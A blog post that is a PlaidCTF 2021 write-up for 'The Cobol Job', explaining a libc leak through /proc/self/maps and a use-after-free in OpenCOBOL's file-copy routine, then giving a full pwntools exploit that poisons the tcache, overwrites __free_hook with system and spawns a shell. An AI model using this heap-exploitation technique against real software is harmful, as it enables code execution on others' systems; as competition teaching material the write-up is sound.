blog of bosh mainly cybersec

PlaidCTF 2021 - The Cobol Job

Even though I was going through some post-quarter-end burnout, I managed to join DiceGang for a bit during PlaidCTF 2021. We ended up getting 2nd, 1 place short of pre-qualifying for DEFCONCTF 2021 Finals :(

The Cobol Job

We are given a cobol program that lets us:

1 - Create file
2 - Open file
3 - Read file
4 - Write file
5 - Close file
6 - Copy file
7 - Exit

We can leak all the addresses including the base of libc by copying /proc/self/maps to a file we create, and then reading it.

I spent a long time learning too much cobol than anyone ever should to look for arbitrary writes. Basically, the sizes, file descriptors, and heap pointers to a fileโ€™s contents are stored in arrays. Ultimately nothing in the implementation would lead to a heap memory corruption.

However, a bug exists in the open cobol implementation of CBL_COPY_FILE, which is used in the copy file function. My teammate KyleForkBomb found this but his internet cut out so I implemented it.

fn1 is freed, and then written to shortly after. fn1 just happens to be a 0x20 sized tcache chunk. Because this is Ubuntu 18.04, there is no pointer mangling so poisoning the tcache is very easy.

Using our libc leak from prior, simply copy a file whose content is the address of __free_hook into a dummy file whose size will fit into tcache idx 0, such as 0x18.

Create two more 0x18-sized files to set up the write into __free_hook. I wrote /bin/sh to one of these files because I planned to free them to get a shell later on.

Allocate one more 0x18-sized file. This fileโ€™s buffer is pointing to __free_hook. Write the address of system to it.

  • The write function first reads our input onto the heap, then writes the input from the heap into the file. So, __free_hook is now pointing to system.

From there we close a file whose content is /bin/sh to trigger the __free_hook, getting us a shell.

from pwn import *

e = ELF("./chall")
libc = ELF("/lib/x86_64-linux-gnu/")

p = process([e.path])
p = remote("", 3083)
context.terminal = ['tmux', 'splitw', '-h']

p.sendlineafter(">", "6")
p.sendlineafter(":", "/proc/self/maps")
p.sendlineafter(":", "/tmp/leek")

p.sendlineafter(">", "2")
p.sendlineafter(":", "/tmp/leek")
p.sendlineafter(":", "1")
p.sendlineafter(":", "10000")

p.sendlineafter(">", "3")
p.sendlineafter(":", "1")

d = p.recvuntil("Exit").splitlines()

for i in d:
    if "libc" in i:
        libc.address = int(i[:12], 16)

print("libc", hex(libc.address))
print("fh", hex(libc.sym["__free_hook"]))

p.sendlineafter(">", "1")
p.sendlineafter(":", "bruh")
p.sendlineafter(":", "2")
p.sendlineafter(":", "24")

p.sendlineafter(">", "4")
p.sendlineafter(":", "2")
p.sendafter(":", p64(libc.sym["__free_hook"])+"\xe8")

p.sendlineafter(">", "6")
p.sendlineafter(":", "bruh")
p.sendlineafter(":", "/tmp/sice")

p.sendlineafter(">", "1")
p.sendlineafter(":", "bruhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbb")
p.sendlineafter(":", "3")
p.sendlineafter(":", "24")

p.sendlineafter(">", "4")
p.sendlineafter(":", "3")
p.sendlineafter(":", "/bin/sh")

p.sendlineafter(">", "1")
p.sendlineafter(":", "bruhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbb")
p.sendlineafter(":", "5")
p.sendlineafter(":", "24")

p.sendlineafter(">", "1")
p.sendlineafter(":", "bruhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbb")
p.sendlineafter(":", "4")
p.sendlineafter(":", "24")

p.sendlineafter(">", "4")
p.sendlineafter(":", "4")
p.sendlineafter(":", p64(libc.sym["system"]))

p.sendlineafter(">", "5")
p.sendlineafter(":", "3")
print("fh", hex(libc.sym["__free_hook"]))



Flag: PCTF{l3arning_n3w_languag3_sh0uld_start_with_g00d_bugs_99d4ec917d097f63107e}